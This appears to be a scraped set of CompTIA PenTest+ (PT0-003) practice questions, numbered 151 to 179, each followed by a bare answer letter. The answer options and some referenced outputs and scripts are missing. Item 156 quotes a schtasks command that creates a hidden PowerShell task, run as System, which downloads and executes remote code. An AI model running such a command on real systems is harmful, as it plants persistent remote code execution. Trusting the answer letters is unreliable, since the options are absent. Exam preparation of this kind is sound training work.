CompTIA's PT0-003 With one day left to complete the testing phase of an engagement, a penetration tester obtains the following results from an Nmap scan: Which of the following tools should the tester use to quickly identify a potential attack path?
#151
Answer: B
CompTIA's PT0-003 A tester is working on an engagement that has evasion and stealth requirements. Which of the following enumeration methods is the least likely to be detected by the IDS?
#152
Answer: A
CompTIA's PT0-003 A penetration tester needs to confirm the version number of a client’s web-application server. Which of the following techniques should the penetration tester use?
#153
Answer: C
CompTIA's PT0-003 A penetration tester wants to identify all the TLS versions used in a web service in order to determine potentially insecure versions. Which of the following commands should the tester use?
#154
Answer: A
CompTIA's PT0-003 Eight months after the completion of a penetration test, the client emails the penetration tester to debate the validity of several findings. The findings are now posing a hindrance to compliance certifications. Which of the following would most likely assist the penetration tester with de-escalation?
#155
Answer: D
CompTIA's PT0-003 A tester obtained access to a computer using an SMB exploit and now has shell access to the target computer. The tester runs the following on the obtained shell:
schtask /create /tn Updates /tr "C:\windows\syswow64\Windows\WindowsPowershell\v1.0\powershell.exe hidden -NoLogo -NoInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('http://10.10.1.2/asd')))'" /sc onlogon /ru System
Which of the following does this action accomplish?
#156
Answer: C
CompTIA's PT0-003 During a security assessment, a penetration tester gains access to an internal server and manipulates some data to hide its presence. Which of the following is the best way for the penetration tester to hide the activities performed?
#157
Answer: A
CompTIA's PT0-003 A penetration tester is assessing the overall preparedness of a client's staff for text-message-based attacks. Which of the following most accurately describes the attack technique the tester is assessing?
#158
Answer: D
CompTIA's PT0-003 A penetration tester attempts to access an internet-facing web page while conducting research on site. However, the web page is no longer accessible. Which of the following is the best step for the tester to take to continue gathering details?
#159
Answer: C
CompTIA's PT0-003 A penetration tester cannot complete a full vulnerability scan because the client's WAF is blocking communications. During which of the following activities should the penetration tester discuss this issue with the client?
#160
Answer: A
CompTIA's PT0-003 Which of the following is a reason to use a template when creating a penetration testing report? E. To improve testing time
#161
Answer: D
CompTIA's PT0-003 During a security audit, a penetration tester wants to exploit a vulnerability in a common network protocol. The protocol allows encrypted communications to be intercepted and manipulated. Which of the following vulnerabilities should the tester exploit?
#162
Answer: C
CompTIA's PT0-003 A penetration tester wants to create a malicious QR code to assist with a physical security assessment. Which of the following tools has the built-in functionality most likely needed for this task?
#163
Answer: A
CompTIA's PT0-003 A penetration tester is trying to execute a post-exploitation activity and creates the following script: Which of the following best describes the tester's objective?
#164
Answer: D
CompTIA's PT0-003 While conducting a peer review for a recent assessment, a penetration tester finds the debugging mode is still enabled for the production system. Which of the following is most likely responsible for this observation?
#165
Answer: A
CompTIA's PT0-003 A penetration tester completed OSINT work and needs to identify common subdomains for mydomain.com. Which of the following is the best command for the tester to use?
#166
Answer: D
CompTIA's PT0-003 Which of the following should a penetration tester do when conducting post-engagement cleanup?
#167
Answer: A
CompTIA's PT0-003 While performing a red-team exercise, a penetration tester uses a reading device to extract data from an employee's access badge. The tester creates a copy for unauthorized entry. Which of the following best describes this attack?
#168
Answer: B
CompTIA's PT0-003 Which of the following security controls should be implemented when systems that are covered by a compliance agreement are maintained separately from other elements of an organization's infrastructure?
#169
Answer: C
CompTIA's PT0-003 A penetration tester needs to launch an Nmap scan to find the state of the port for both TCP and UDP services. Which of the following commands should the tester use?
#170
Answer: C
CompTIA's PT0-003 A penetration tester gains access to a domain member server and wants to identify which potential targets are available to attack. Which of the following tools should the penetration tester use?
#171
Answer: C
CompTIA's PT0-003 During a web application assessment, a penetration tester identifies an administrative tool that would allow for the production database to be deleted without authorization. Which of the following is most important for the penetration tester to consider before proceeding with testing?
#172
Answer: A
CompTIA's PT0-003 A company hires a penetration tester to perform an external attack surface review as part of a security engagement. The company informs the tester that the main company domain to investigate is comptia.org. Which of the following should the tester do to accomplish the assessment objective?
#173
Answer: A
CompTIA's PT0-003 The following file was obtained during reconnaissance: Which of the following is most likely to be successful if a penetration tester achieves non-privileged user access?
#174
Answer: A
CompTIA's PT0-003 A penetration tester uses a pair of crutches to access a client's physical location. Which of the following is the tester most likely trying to do?
#175
Answer: B
CompTIA's PT0-003 A penetration tester creates the following Python script that can be used to enumerate information about email accounts on a target mail server: Which of the following logic constructs would permit the script to continue despite failure?
#176
Answer: C
CompTIA's PT0-003 A penetration tester obtained a shell on a Windows system. Which of the following would the tester use to gather more information about the host?
#177
Answer: C
CompTIA's PT0-003 During an engagement, a penetration tester wants to enumerate users from Linux systems by using finger and rwho commands. However, the tester realizes these commands alone will not achieve the desired result. Which of the following is the best tool to use for this task?
#178
Answer: C
CompTIA's PT0-003 During a security assessment of an e-commerce website, a penetration tester wants to exploit a vulnerability in the web server’s input validation that will allow unauthorized transactions on behalf of the user. Which of the following techniques would most likely be used for that purpose?
#179
Answer: D
CompTIA's PT0-003 A penetration tester is getting ready to conduct a vulnerability scan to evaluate an environment that consists of a container orchestration cluster. Which of the following tools would be best to use for this purpose?